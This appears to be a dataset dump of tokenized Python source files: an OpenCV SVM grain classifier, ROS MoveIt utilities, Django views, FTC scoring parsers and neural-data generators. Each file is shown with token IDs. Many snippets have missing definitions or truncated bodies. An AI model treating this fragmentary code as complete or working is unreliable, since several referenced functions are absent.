content stringlengths 1 1.04M | input_ids listlengths 1 774k | ratio_char_token float64 0.38 22.9 | token_count int64 1 774k |
|---|---|---|---|
import matplotlib.pyplot as plt
from cv2 import (ml, imread, threshold, findContours, moments, contourArea, arcLength,
boundingRect, drawContours, cvtColor,
IMREAD_GRAYSCALE, TERM_CRITERIA_MAX_ITER, COLOR_GRAY2RGB)
from numpy import (array, matrix, ones, empty, delete, sqrt, pi,
vstack, hstack, concatenate, float32, int64)
from sklearn.metrics import accuracy_score, confusion_matrix, ConfusionMatrixDisplay
from PyQt5.QtWidgets import QDialog
from PyQt5.QtCore import QCoreApplication, QSize
from src.constants import RETRIEVAL_MODES, APPROXIMATION_MODES
from ..operation import Operation
from .svm_ui import SVMUI
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib import use
use("Qt5Agg")
class SVM(QDialog, Operation, SVMUI):
"""The SVM class implements a support vector machine classification."""
def __init__(self, parent):
"""
Create a new dialog window to perform SVM classification.
Get image data from :param:`parent`.
:param parent: The image to classificate
:type parent: :class:`image.Image`
"""
super().__init__()
self.init_ui(self)
self.img_data = parent.data.copy()
self.current_img_data = None
self.training_data = None
self.training_shape = None
self.training_labels = None
self.svm = ml.SVM_create()
self.svm_accuracy = None
self.rbtn_show_confusion_matrix.clicked.connect(self.update_cm)
self.train_SVM()
self.make_predictions()
self.__retranslate_ui()
self.update_img_preview()
def __retranslate_ui(self):
"""Set the text and titles of the widgets."""
_translate = QCoreApplication.translate
_window_title = "SVM Classification"
_svm_desc = "The SVM classifies objects belonging to the three classes: <b>rice, beans, lentils</b>"
_training_data = f"The training data has {self.training_shape[1]} features (properties) " \
f"and {self.training_shape[0]} examples"
_svm_accuracy = "Trained accuracy: " + str(self.svm_accuracy)
_objects_colors = "The objects classified as rice have green contours, " \
"beans have blue, and lentils have red ones"
self.setWindowTitle(_window_title)
self.label_svm_desc.setText(_translate(_window_title, _svm_desc))
self.label_training_data.setText(_translate(_window_title, _training_data))
self.label_svm_accuracy.setText(_translate(_window_title, _svm_accuracy))
self.label_objects_colors.setText(_translate(_window_title, _objects_colors))
def get_features(self, img_data):
"""Return vector of properties for all found objects in the image."""
_, img_data = threshold(img_data, 127, 255, 0)
contours, _ = findContours(img_data, RETRIEVAL_MODES['List'], APPROXIMATION_MODES['Simple'])
features = empty((29, 0))
for contour in contours:
obj_moments = moments(contour)
moments_values = obj_moments.values()
moments_values = array(list(moments_values)).flatten().reshape(-1, 1)
area = contourArea(contour)
perimeter = arcLength(contour, True)
_, _, width, height = boundingRect(contour)
aspect_ratio = float(width) / height
rect_area = width * height
extent = float(area) / rect_area
equivalent_diameter = sqrt(4 * area / pi)
feature_vector = array([area, perimeter, aspect_ratio, extent, equivalent_diameter]).reshape(-1, 1)
feature_vector = vstack((moments_values, feature_vector))
features = hstack((features, feature_vector))
return features
def get_labels(self, input_features, label_class=1):
"""Return the vector of labeled properties."""
shape = input_features.shape
out = ones((shape[1], 1))
return out * label_class
def update_training_data(self):
"""Calculate properties and labels of training data."""
img = imread('icons/SVM_train_data/train_ryz.jpg', IMREAD_GRAYSCALE)
features1 = self.get_features(img)
features1 = delete(features1, features1.shape[1] - 1, axis=1)
img = imread('icons/SVM_train_data/train_soczewica.jpg', IMREAD_GRAYSCALE)
features2 = self.get_features(img)
features2 = delete(features2, features2.shape[1] - 1, axis=1)
img = imread('icons/SVM_train_data/train_fasola.jpg', IMREAD_GRAYSCALE)
features3 = self.get_features(img)
features3 = delete(features3, features3.shape[1] - 1, axis=1)
self.training_data = float32(
concatenate((features1, concatenate((features2, features3), axis=1)), axis=1).transpose()
)
self.training_shape = self.training_data.shape
label1 = self.get_labels(features1, 1)
label2 = self.get_labels(features2, 2)
label3 = self.get_labels(features3, 3)
self.training_labels = int64(concatenate((label1, concatenate((label2, label3)))))
def train_SVM(self):
"""Train the SVM on calculated training data."""
self.update_training_data()
self.svm.setType(ml.SVM_C_SVC)
self.svm.setKernel(ml.SVM_LINEAR)
self.svm.setTermCriteria((TERM_CRITERIA_MAX_ITER, 1000, 1e-6))
self.svm.train(self.training_data, ml.ROW_SAMPLE, self.training_labels)
self.update_svm_accuracy()
def update_svm_accuracy(self):
"""Calculate SVM accuracy and confusion matrix."""
prediction = self.svm.predict(self.training_data)[1]
self.svm_accuracy = accuracy_score(self.training_labels, prediction)
self.cm_display = ConfusionMatrixDisplay(confusion_matrix(self.training_labels, prediction),
display_labels=['rice', 'lentils', 'beans'])
self.cm_display.plot()
self.cm_canvas = FigureCanvas(plt.gcf())
self.layout_preview.addWidget(self.cm_canvas)
self.cm_canvas.draw()
self.cm_canvas.setVisible(False)
def make_predictions(self):
"""Predict object classification."""
img_data = self.img_data.copy()
features = self.get_features(img_data)
_, img_data = threshold(img_data, 127, 255, 0)
contours, _ = findContours(img_data, RETRIEVAL_MODES['List'], APPROXIMATION_MODES['None'])
img_data = cvtColor(img_data, COLOR_GRAY2RGB)
for i in range(len(contours)):
feature_predict = float32(features[:, i].reshape(-1, 1).transpose())
response = self.svm.predict(feature_predict)[1]
contour = contours[i]
if response == 1:
drawContours(img_data, [contour], 0, (0, 255, 0), 3)
elif response == 2:
drawContours(img_data, [contour], 0, (0, 0, 255), 3)
elif response == 3:
drawContours(img_data, [contour], 0, (255, 0, 0), 3)
else:
drawContours(img_data, [contour], 0, (255, 255, 255), 3)
self.current_img_data = img_data
def update_cm(self):
"""Update confusion matrix canvas visibility whenever :attr:`rbtn_show_confusion_matrix` clicked."""
if self.rbtn_show_confusion_matrix.isChecked():
self.cm_canvas.setVisible(True)
self.resize(self.layout.sizeHint() + QSize(self.cm_canvas.size().width(), 0))
else:
self.cm_canvas.setVisible(False)
self.resize(self.layout.sizeHint() - QSize(self.cm_canvas.size().width(), 0))
self.adjustSize()
| [
11748,
2603,
29487,
8019,
13,
9078,
29487,
355,
458,
83,
198,
198,
6738,
269,
85,
17,
1330,
357,
4029,
11,
545,
961,
11,
11387,
11,
1064,
4264,
4662,
11,
7188,
11,
542,
454,
30547,
11,
10389,
24539,
11,
198,
220,
220,
220,
220,
22... | 2.27907 | 3,397 |
from collections import deque
| [
6738,
17268,
1330,
390,
4188,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220
] | 1.8 | 30 |
import argparse
import asyncio
import json
import math
import random
import signal
import time
from datetime import datetime, timedelta
#from netifaces import interfaces, ifaddresses, AF_INET
import socket
import traceback
import configChecker
import filecmp
import shutil
import sys
import simpleDali
# #For Testing
# productionDirectory="./ConfigFiles"
# prepDir=productionDirectory + "/ConfigFileEdit"
# archiveDir=productionDirectory + "/ConfigFileArchive"
# deployDir=productionDirectory + "/Run/ConfigFile"
# For Production Run
productionDirectory="/home/geo/Production"
prepDir=productionDirectory + "/ConfigFileEdit"
archiveDir=productionDirectory + "/ConfigFileArchive"
deployDir=productionDirectory + "/Run/ConfigFile"
if __name__ == "__main__":
# execute only if run as a script
parser = argparse.ArgumentParser()
parser.add_argument("-t",
dest="tokenFile",
type=argparse.FileType('r'),
help="tokenfile, encoded on first line")
parser.add_argument("-i",
dest="interval",
type=int,
default=60,
help="send time interval in seconds")
args = parser.parse_args()
sender = SendConfig(args.interval, args.tokenFile)
signal.signal(signal.SIGINT, handleSignal)
signal.signal(signal.SIGTERM, handleSignal)
sender.run()
| [
11748,
1822,
29572,
198,
11748,
30351,
952,
198,
11748,
33918,
198,
11748,
10688,
198,
11748,
4738,
198,
11748,
6737,
198,
11748,
640,
198,
6738,
4818,
8079,
1330,
4818,
8079,
11,
28805,
12514,
198,
2,
6738,
2010,
361,
2114,
1330,
20314,
... | 2.600726 | 551 |
#!/usr/bin/env python
# encoding: utf-8
"""
util.py
Created by Ronak Shah on April 12, 2018.
Copyright (c) 2018 Northwell Health. All rights reserved.
"""
import json
import logging
import os
import sys
RESOURCE_FILE = os.getenv('PIE_RESOURCE_CONFIG', "pie_resources.json")
JSON_CONFIG = json.load(open(RESOURCE_FILE))
programs = JSON_CONFIG['programs']
genomes = JSON_CONFIG['genomes']
chr1_fingerprints = JSON_CONFIG['chr1_fingerprints']
keys = JSON_CONFIG['keys']
targets = JSON_CONFIG['targets']
config = JSON_CONFIG['config']
FORMAT = '%(asctime)-15s %(funcName)-8s %(levelname)s %(message)s'
OUT_HANDLAR = logging.StreamHandler(sys.stdout)
OUT_HANDLAR.setFormatter(logging.Formatter(FORMAT))
OUT_HANDLAR.setLevel(logging.INFO)
LOGGER = logging.getLogger('pie')
LOGGER.addHandler(OUT_HANDLAR)
LOGGER.setLevel(logging.INFO)
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
2,
21004,
25,
3384,
69,
12,
23,
198,
37811,
198,
22602,
13,
9078,
198,
198,
41972,
416,
6575,
461,
18381,
319,
3035,
1105,
11,
2864,
13,
198,
15269,
357,
66,
8,
2864,
2258,
4053,
3... | 2.658147 | 313 |
import json
import cherrypy
import logging
from saml2 import BINDING_HTTP_POST
from saml2 import BINDING_HTTP_REDIRECT
from ventcat import conv_response, as_unicode
from ventcat import UnSupported
from ventcat.acs import ACS
from ventcat.response import Response, make_cookie
from ventcat.sso import SSO
logger = logging.getLogger(__name__)
BINDING_MAP = {'post': BINDING_HTTP_POST, 'redirect': BINDING_HTTP_REDIRECT}
| [
11748,
33918,
198,
198,
11748,
23612,
9078,
198,
11748,
18931,
198,
198,
6738,
6072,
75,
17,
1330,
347,
12115,
2751,
62,
40717,
62,
32782,
198,
6738,
6072,
75,
17,
1330,
347,
12115,
2751,
62,
40717,
62,
22083,
40,
23988,
198,
198,
673... | 3.028571 | 140 |
# Version 3.0 - 2021 September 10
# work for both Mac, Windows, Linux
# use clear() for clearing terminal
# Method 1
# from clearterminal import * -----> clear()
# Method 2
# import clearterminal -----> clearterminal.clear()
import os
import platform
platform = platform.system()
if platform == 'Darwin': # for Unix (MacOS, Linux)
text = "clear"
elif platform == 'Windows': # for Windows
text = 'cls'
if __name__ == '__main__':
input('''This is the terminal output
This is the terminal output
This is the terminal output
This is the terminal output
Press Enter to excute the clear() function for the terminal
from clearterminal import * -----> clear()
import clearterminal -----> clearterminal.clear()''')
clear()
| [
2,
10628,
513,
13,
15,
532,
33448,
2693,
838,
198,
198,
2,
670,
329,
1111,
4100,
11,
3964,
11,
7020,
198,
2,
779,
1598,
3419,
329,
17304,
12094,
198,
2,
11789,
352,
198,
2,
422,
1598,
23705,
282,
1330,
1635,
13498,
3784,
1598,
341... | 3.455399 | 213 |
# -*- coding: utf-8 -*-
# Import the reverse lookup function
from django.core.urlresolvers import reverse
# view imports
from django.views.generic import DetailView
from django.views.generic import RedirectView
from django.views.generic import UpdateView
from django.views.generic import ListView
# Will be used for logged in and logged out messages
from django.contrib import messages
from django.contrib.auth.signals import user_logged_in, user_logged_out
# Only authenticated users can access views using this.
from braces.views import LoginRequiredMixin
# Import the form from users/forms.py
from .forms import UserUpdateForm
# Import the customized User model
from .models import User
user_logged_in.connect(logged_in_message)
user_logged_out.connect(logged_out_message)
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
2,
17267,
262,
9575,
35847,
2163,
198,
6738,
42625,
14208,
13,
7295,
13,
6371,
411,
349,
690,
1330,
9575,
198,
198,
2,
1570,
17944,
198,
6738,
42625,
14208,
13,
33571,
... | 3.49115 | 226 |
from should_be import core as sc
import unittest
| [
6738,
815,
62,
1350,
1330,
4755,
355,
629,
198,
11748,
555,
715,
395,
628,
198
] | 3.4 | 15 |
#!/usr/bin/env python
### IMPORTS
#
# `moveit_commander` namespace allows Python MoveIt interfaces.
# Includes a `MoveGroupCommander`_, `PlanningSceneInterface`_, and `RobotCommander`_ class
#
# Additional imports allow used for support, ROS messages, and etc.
import sys
import copy
import rospy
import moveit_commander
import moveit_msgs.msg
import geometry_msgs.msg
from math import pi, radians
from std_msgs.msg import String
from moveit_commander.conversions import pose_to_list
from motoman_msgs.srv import ReadSingleIO, WriteSingleIO
## Quaternion Tools
from tf.transformations import euler_from_quaternion, quaternion_from_euler
## Maze Runner Specific
import csv
#####################################################
## SUPPORT CLASSES AND FUNCTIONS
##
def all_close(goal, actual, tolerance):
"""
Convenience method for testing if a list of values are within a tolerance of their counterparts in another list
@param: goal A list of floats, a Pose or a PoseStamped
@param: actual A list of floats, a Pose or a PoseStamped
@param: tolerance A float
@returns: bool
"""
all_equal = True
if type(goal) is list:
for index in range(len(goal)):
if abs(actual[index] - goal[index]) > tolerance:
return False
elif type(goal) is geometry_msgs.msg.PoseStamped:
return all_close(goal.pose, actual.pose, tolerance)
elif type(goal) is geometry_msgs.msg.Pose:
return all_close(pose_to_list(goal), pose_to_list(actual), tolerance)
return True
class moveManipulator(object):
"""moveManipulator Class""" | [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
198,
21017,
30023,
33002,
198,
2,
198,
2,
4600,
21084,
270,
62,
9503,
4066,
63,
25745,
3578,
11361,
10028,
1026,
20314,
13,
198,
2,
29581,
257,
4600,
21774,
13247,
6935,
4066,
63,
62,
... | 3.146586 | 498 |
from random import random
from hk_common import *
from hk_sp import *
from test_code_common import *
from test_code_eps import *
from test_code_aocs import *
from test_code_obc import *
from test_code_st import *
from test_code_sp import *
from test_code_pcom import *
from test_code_scom import *
from client.kaitai.main_kaitai import *
hk_packet = generate_icp()
for byte in hk_packet:
print('{:02x}'.format(byte).upper(), end="")
print()
target = Main.from_bytes(hk_packet)
print({target.common_data.uptime})
print({target.spec_data.obc.fmc_mram_temp})
print({target.spec_data.aocs.sun_y_intensity_loc4})
| [
6738,
4738,
1330,
4738,
198,
198,
6738,
289,
74,
62,
11321,
1330,
1635,
198,
6738,
289,
74,
62,
2777,
1330,
1635,
198,
198,
6738,
1332,
62,
8189,
62,
11321,
1330,
1635,
198,
6738,
1332,
62,
8189,
62,
25386,
1330,
1635,
198,
6738,
13... | 2.638298 | 235 |
##@package daysselector
# @author Sebastien MATHIEU
from abc import ABCMeta, abstractmethod
## Abstract class of a day selector.
| [
2235,
31,
26495,
1528,
19738,
273,
198,
2,
2488,
9800,
22787,
2013,
337,
12599,
10008,
52,
198,
198,
6738,
450,
66,
1330,
9738,
48526,
11,
12531,
24396,
628,
198,
2235,
27741,
1398,
286,
257,
1110,
31870,
13,
198
] | 3.473684 | 38 |
from trex.stl.api import *
| [
6738,
2054,
87,
13,
301,
75,
13,
15042,
1330,
1635,
628
] | 2.545455 | 11 |
import logging
from models import Event, Ranking, Award, Match, MatchScore
from bs4 import BeautifulSoup
from db.orm import orm
class ResultsPageHelper:
"""Helper methods to parse the output from FTC Live Scoring Software pages"""
res_map = {"R": "red", "B": "blue", "T": "tie"}
@classmethod
@classmethod
@classmethod
@classmethod
@classmethod
def load_rankings(cls, table, matches, has_hs=True):
"""has_hs=False is necessary for rly old data"""
try:
event_key = matches[0][0].event_key
except IndexError:
logging.warning("can't load rankings on zero length match table!")
return
high_scores, wlt = cls.highscores_wlt(matches)
ret = []
#first = True
for tr in table.find_all("tr"):
td_tags = list(tr.find_all("td"))
if not td_tags:
continue
td = [td.get_text() for td in td_tags]
tkey = "ftc" + td[1]
twlt = wlt[tkey]
if not has_hs:
r = Ranking(event_key=event_key, team_key=tkey, rank=int(td[0]), qp_rp=int(td[3]), rp_tbp=int(td[4]),
high_score=high_scores.get(tkey, 0),
wins=twlt[0], losses=twlt[1], ties=twlt[2], dqed=0, played=int(td[5]))
else:
r = Ranking(event_key=event_key, team_key=tkey, rank=int(td[0]), qp_rp=int(td[3]), rp_tbp=int(td[4]),
high_score=int(td[5]),
wins=twlt[0], losses=twlt[1], ties=twlt[2], dqed=0, played=int(td[6]))
ret.append(r)
return ret
@classmethod
| [
11748,
18931,
198,
6738,
4981,
1330,
8558,
11,
45407,
11,
11289,
11,
13225,
11,
13225,
26595,
198,
6738,
275,
82,
19,
1330,
23762,
50,
10486,
198,
6738,
20613,
13,
579,
1330,
393,
76,
198,
198,
4871,
15691,
9876,
47429,
25,
198,
220,
... | 1.934407 | 869 |
# Class to generate data for training
import numpy as np
import json
import h5py
import os
import tensorflow.keras as keras
from deepinterpolation.generic import JsonLoader
import tifffile
import nibabel as nib
from scipy.io import wavfile
import s3fs
class DeepGenerator(keras.utils.Sequence):
"""
This class instantiante the basic Generator Sequence object from which all Deep Interpolation generator should be generated.
Parameters:
json_path: a path to the json file used to parametrize the generator
Returns:
None
"""
def get_input_size(self):
"""
This function returns the input size of the generator, excluding the batching dimension
Parameters:
None
Returns:
tuple: list of integer size of input array, excluding the batching dimension
"""
local_obj = self.__getitem__(0)[0]
return local_obj.shape[1:]
def get_output_size(self):
"""
This function returns the output size of the generator, excluding the batching dimension
Parameters:
None
Returns:
tuple: list of integer size of output array, excluding the batching dimension
"""
local_obj = self.__getitem__(0)[1]
return local_obj.shape[1:]
def __get_norm_parameters__(self, idx):
"""
This function returns the normalization parameters of the generator. This can potentially be different for each data sample
Parameters:
idx index of the sample
Returns:
local_mean
local_std
"""
local_mean = self.local_mean
local_std = self.local_std
return local_mean, local_std
class OnePGenerator(DeepGenerator):
"""
This generator deliver data provided from an hdf5 file made
from one photon miniscope data.
Parameters:
str: json_path: path to the json parameter file
Returns:
None
"""
def __len__(self):
"Denotes the total number of batches"
return int(np.floor(float(len(self.list_samples)) / self.batch_size))
def __data_generation__(self, index_frame):
"Generates data containing batch_size samples"
# local_raw_data = h5py.File(self.raw_data_file, 'r')['1']
input_full = np.zeros(
[1, self.movie_size[1], self.movie_size[2], self.pre_post_frame * 2]
)
output_full = np.zeros([1, self.movie_size[1], self.movie_size[2], 1])
input_index = np.arange(
index_frame - self.pre_post_frame, index_frame + self.pre_post_frame + 1
)
input_index = input_index[input_index != index_frame]
data_img_input = self.local_raw_data[input_index, :, :]
data_img_output = self.local_raw_data[index_frame, :, :]
data_img_input = np.swapaxes(data_img_input, 1, 2)
data_img_input = np.swapaxes(data_img_input, 0, 2)
img_in_shape = data_img_input.shape
img_out_shape = data_img_output.shape
data_img_input = (
data_img_input.astype("float") - self.local_mean
) / self.local_std
data_img_output = (
data_img_output.astype("float") - self.local_mean
) / self.local_std
input_full[0, : img_in_shape[0], : img_in_shape[1], :] = data_img_input
output_full[0, : img_out_shape[0], : img_out_shape[1], 0] = data_img_output
return input_full, output_full
class CollectorGenerator(DeepGenerator):
"This class allows to create a generator of generators for the purpose of training across multiple files"
"All generators must have idendical batch size and input, output size but can be different length"
def __len__(self):
"Denotes the total number of batches"
total_len = 0
for local_generator in self.generator_list:
total_len = total_len + local_generator.__len__()
return total_len
class EphysGenerator(DeepGenerator):
"Generates data for Keras"
def __init__(self, json_path):
"Initialization"
super().__init__(json_path)
self.raw_data_file = self.json_data["train_path"]
self.batch_size = self.json_data["batch_size"]
self.pre_post_frame = self.json_data["pre_post_frame"]
self.pre_post_omission = self.json_data["pre_post_omission"]
self.start_frame = self.json_data["start_frame"]
self.steps_per_epoch = self.json_data["steps_per_epoch"]
# This is compatible with negative frames
self.end_frame = self.json_data["end_frame"]
#self.nb_probes = 384
self.nb_probes = self.json_data["nb_probes"] # modified by sk 2020/11/20
self.raw_data = np.memmap(self.raw_data_file, dtype="int16")
if self.end_frame < 0:
self.img_per_movie = (
int(self.raw_data.size / self.nb_probes)
+ 1
+ self.end_frame
- self.start_frame
- self.pre_post_frame
- self.pre_post_omission
)
elif int(self.raw_data.size / self.nb_probes) < self.end_frame:
self.img_per_movie = (
int(self.raw_data.size / self.nb_probes)
- self.start_frame
- self.pre_post_frame
- self.pre_post_omission
)
else:
self.img_per_movie = self.end_frame + 1 - self.start_frame
self.total_frame_per_movie = int(self.raw_data.size / self.nb_probes)
average_nb_samples = 200000
shape = (self.total_frame_per_movie, int(self.nb_probes / 2), 2)
# load it with the correct shape
self.raw_data = np.memmap(self.raw_data_file, dtype="int16", shape=shape)
# Older reshape code, to remove when stable
# Reshape in number of traces
# self.raw_data = np.reshape(self.raw_data, (self.total_frame_per_movie,
# self.nb_probes))
# Reshape following probes location
# self.raw_data = np.reshape(self.raw_data, (self.total_frame_per_movie
# int(self.nb_probes/2), 2)
local_data = self.raw_data[0:average_nb_samples, :, :].flatten()
local_data = local_data.astype("float32")
self.local_mean = np.mean(local_data)
self.local_std = np.std(local_data)
self.epoch_index = 0
self.list_samples = np.arange(
self.start_frame, self.start_frame + self.img_per_movie
)
if "randomize" in self.json_data.keys():
if self.json_data["randomize"] == 1:
np.random.shuffle(self.list_samples)
def __len__(self):
"Denotes the total number of batches"
return int(np.floor(float(len(self.list_samples)) / self.batch_size))
def __data_generation__(self, index_frame):
"Generates data containing batch_size samples"
# We reorganize to follow true geometry of probe for convolution
input_full = np.zeros(
[1, self.nb_probes, 2, self.pre_post_frame * 2], dtype="float32"
)
output_full = np.zeros([1, self.nb_probes, 2, 1], dtype="float32")
input_index = np.arange(
index_frame - self.pre_post_frame - self.pre_post_omission,
index_frame + self.pre_post_frame + self.pre_post_omission + 1,
)
input_index = input_index[input_index != index_frame]
for index_padding in np.arange(self.pre_post_omission + 1):
input_index = input_index[input_index != index_frame - index_padding]
input_index = input_index[input_index != index_frame + index_padding]
data_img_input = self.raw_data[input_index, :, :]
data_img_output = self.raw_data[index_frame, :, :]
data_img_input = np.swapaxes(data_img_input, 1, 2)
data_img_input = np.swapaxes(data_img_input, 0, 2)
img_in_shape = data_img_input.shape
data_img_input = (
data_img_input.astype("float32") - self.local_mean
) / self.local_std
data_img_output = (
data_img_output.astype("float32") - self.local_mean
) / self.local_std
# alternating filling with zeros padding
even = np.arange(0, self.nb_probes, 2)
odd = even + 1
input_full[0, even, 0, :] = data_img_input[:, 0, :]
input_full[0, odd, 1, :] = data_img_input[:, 1, :]
output_full[0, even, 0, 0] = data_img_output[:, 0]
output_full[0, odd, 1, 0] = data_img_output[:, 1]
return input_full, output_full
class SingleTifGenerator(DeepGenerator):
"Generates data for Keras"
def __init__(self, json_path):
"Initialization"
super().__init__(json_path)
self.raw_data_file = self.json_data["train_path"]
self.batch_size = self.json_data["batch_size"]
self.pre_post_frame = self.json_data["pre_post_frame"]
self.pre_post_omission = self.json_data["pre_post_omission"]
self.start_frame = self.json_data["start_frame"]
if "randomize" in self.json_data.keys():
self.randomize = self.json_data["randomize"]
else:
self.randomize = 1
# This is compatible with negative frames
self.end_frame = self.json_data["end_frame"]
with tifffile.TiffFile(self.raw_data_file) as tif:
self.raw_data = tif.asarray()
self.total_frame_per_movie = self.raw_data.shape[0]
if self.end_frame < 0:
self.img_per_movie = (
self.total_frame_per_movie + 1 + self.end_frame - self.start_frame
)
elif self.total_frame_per_movie < self.end_frame:
self.img_per_movie = self.total_frame_per_movie + 1 - self.start_frame
else:
self.img_per_movie = self.end_frame + 1 - self.start_frame
average_nb_samples = 1000
local_data = self.raw_data[0:average_nb_samples, :, :].flatten()
local_data = local_data.astype("float32")
self.local_mean = np.mean(local_data)
self.local_std = np.std(local_data)
self.list_samples = np.arange(
self.pre_post_frame + self.pre_post_omission + self.start_frame,
self.start_frame
+ self.img_per_movie
- self.pre_post_frame
- self.pre_post_omission,
)
if self.randomize:
np.random.shuffle(self.list_samples)
def __len__(self):
"Denotes the total number of batches"
return int(np.floor(float(len(self.list_samples)) / self.batch_size))
def __data_generation__(self, index_frame):
# X : (n_samples, *dim, n_channels)
"Generates data containing batch_size samples"
input_full = np.zeros(
[
1,
self.raw_data.shape[1],
self.raw_data.shape[2],
self.pre_post_frame * 2,
],
dtype="float32",
)
output_full = np.zeros(
[1, self.raw_data.shape[1], self.raw_data.shape[2], 1], dtype="float32"
)
input_index = np.arange(
index_frame - self.pre_post_frame - self.pre_post_omission,
index_frame + self.pre_post_frame + self.pre_post_omission + 1,
)
input_index = input_index[input_index != index_frame]
for index_padding in np.arange(self.pre_post_omission + 1):
input_index = input_index[input_index != index_frame - index_padding]
input_index = input_index[input_index != index_frame + index_padding]
data_img_input = self.raw_data[input_index, :, :]
data_img_output = self.raw_data[index_frame, :, :]
data_img_input = np.swapaxes(data_img_input, 1, 2)
data_img_input = np.swapaxes(data_img_input, 0, 2)
img_in_shape = data_img_input.shape
img_out_shape = data_img_output.shape
data_img_input = (
data_img_input.astype("float32") - self.local_mean
) / self.local_std
data_img_output = (
data_img_output.astype("float32") - self.local_mean
) / self.local_std
input_full[0, : img_in_shape[0], : img_in_shape[1], :] = data_img_input
output_full[0, : img_out_shape[0], : img_out_shape[1], 0] = data_img_output
return input_full, output_full
class OphysGenerator(DeepGenerator):
"Generates data for Keras"
def __init__(self, json_path):
"Initialization"
super().__init__(json_path)
if "from_s3" in self.json_data.keys():
self.from_s3 = self.json_data["from_s3"]
else:
self.from_s3 = False
self.raw_data_file = self.json_data["movie_path"]
self.batch_size = self.json_data["batch_size"]
self.pre_frame = self.json_data["pre_frame"]
self.post_frame = self.json_data["post_frame"]
self.start_frame = self.json_data["start_frame"]
# This is compatible with negative frames
self.end_frame = self.json_data["end_frame"]
# This is used to limit the total number of samples
# -1 means to take all and is the default fall back
if "total_samples" in self.json_data.keys():
self.total_samples = self.json_data["total_samples"]
else:
self.total_samples = -1
if self.from_s3:
s3_filesystem = s3fs.S3FileSystem()
raw_data = h5py.File(s3_filesystem.open(self.raw_data_file,'rb'),'r')['data']
else:
raw_data = h5py.File(self.raw_data_file, "r")["data"]
self.total_frame_per_movie = int(raw_data.shape[0])
if self.end_frame < 0:
self.img_per_movie = (
self.total_frame_per_movie
+ 1
+ self.end_frame
- self.start_frame
- self.post_frame
)
elif self.total_frame_per_movie < self.end_frame:
self.img_per_movie = (
self.total_frame_per_movie - self.start_frame - self.post_frame
)
else:
self.img_per_movie = self.end_frame + 1 - self.start_frame
average_nb_samples = 1000
local_data = raw_data[0:average_nb_samples, :, :].flatten()
local_data = local_data.astype("float32")
self.local_mean = np.mean(local_data)
self.local_std = np.std(local_data)
self.list_samples = np.arange(
self.start_frame, self.start_frame + self.img_per_movie
)
if "randomize" in self.json_data.keys():
self.randomize = self.json_data["randomize"]
else:
self.randomize = 1
if self.randomize:
np.random.shuffle(self.list_samples)
# We cut the number of samples if asked to
if self.total_samples>0 and self.total_samples<len(self.list_samples):
self.list_samples = self.list_samples[0:self.total_samples]
def __len__(self):
"Denotes the total number of batches"
return int(np.floor(float(len(self.list_samples)) / self.batch_size))
def __data_generation__(self, index_frame):
"Generates data containing batch_size samples"
if self.from_s3:
s3_filesystem = s3fs.S3FileSystem()
movie_obj = h5py.File(s3_filesystem.open(self.raw_data_file,'rb'),'r')
else:
movie_obj = h5py.File(self.raw_data_file, "r")
input_full = np.zeros([1, 512, 512, self.pre_frame + self.post_frame])
output_full = np.zeros([1, 512, 512, 1])
input_index = np.arange(
index_frame - self.pre_frame, index_frame + self.post_frame + 1,
)
input_index = input_index[input_index != index_frame]
data_img_input = movie_obj["data"][input_index, :, :]
data_img_output = movie_obj["data"][index_frame, :, :]
data_img_input = np.swapaxes(data_img_input, 1, 2)
data_img_input = np.swapaxes(data_img_input, 0, 2)
img_in_shape = data_img_input.shape
img_out_shape = data_img_output.shape
data_img_input = (
data_img_input.astype("float") - self.local_mean
) / self.local_std
data_img_output = (
data_img_output.astype("float") - self.local_mean
) / self.local_std
input_full[0, : img_in_shape[0], : img_in_shape[1], :] = data_img_input
output_full[0, : img_out_shape[0], : img_out_shape[1], 0] = data_img_output
movie_obj.close()
return input_full, output_full
class MovieJSONGenerator(DeepGenerator):
"Generates data for Keras"
def __init__(self, json_path):
"Initialization"
super().__init__(json_path)
self.sample_data_path_json = self.json_data["train_path"]
self.batch_size = self.json_data["batch_size"]
self.steps_per_epoch = self.json_data["steps_per_epoch"]
self.epoch_index = 0
# The following is to be backward compatible
if "pre_frame" in self.json_data.keys():
self.pre_frame = self.json_data["pre_frame"]
else:
self.pre_frame = self.json_data["pre_post_frame"]
if "post_frame" in self.json_data.keys():
self.post_frame = self.json_data["post_frame"]
else:
self.post_frame = self.json_data["pre_post_frame"]
with open(self.sample_data_path_json, "r") as json_handle:
self.frame_data_location = json.load(json_handle)
self.lims_id = list(self.frame_data_location.keys())
self.nb_lims = len(self.lims_id)
self.img_per_movie = len(self.frame_data_location[self.lims_id[0]]["frames"])
def __len__(self):
"Denotes the total number of batches"
return int(np.ceil(float(self.nb_lims * self.img_per_movie) / self.batch_size))
def __data_generation__(self, index_frame):
# X : (n_samples, *dim, n_channels)
"Generates data containing batch_size samples"
try:
local_lims, local_img = self.get_lims_id_sample_from_index(index_frame)
# Initialization
local_path = self.frame_data_location[local_lims]["path"]
_filenames = ["motion_corrected_video.h5", "concat_31Hz_0.h5"]
motion_path = []
for _filename in _filenames:
_filepath = os.path.join(local_path, "processed", _filename)
if os.path.exists(_filepath) and not os.path.islink(
_filepath
): # Path exists and is not symbolic
motion_path = _filepath
break
movie_obj = h5py.File(motion_path, "r")
output_frame = self.frame_data_location[local_lims]["frames"][local_img]
local_mean = self.frame_data_location[local_lims]["mean"]
local_std = self.frame_data_location[local_lims]["std"]
input_full = np.zeros([1, 512, 512, self.pre_frame + self.post_frame])
output_full = np.zeros([1, 512, 512, 1])
input_index = np.arange(
output_frame - self.pre_frame, output_frame + self.post_frame + 1,
)
input_index = input_index[input_index != output_frame]
data_img_input = movie_obj["data"][input_index, :, :]
data_img_output = movie_obj["data"][output_frame, :, :]
data_img_input = np.swapaxes(data_img_input, 1, 2)
data_img_input = np.swapaxes(data_img_input, 0, 2)
img_in_shape = data_img_input.shape
img_out_shape = data_img_output.shape
data_img_input = (data_img_input.astype("float") - local_mean) / local_std
data_img_output = (data_img_output.astype("float") - local_mean) / local_std
input_full[0, : img_in_shape[0], : img_in_shape[1], :] = data_img_input
output_full[0, : img_out_shape[0], : img_out_shape[1], 0] = data_img_output
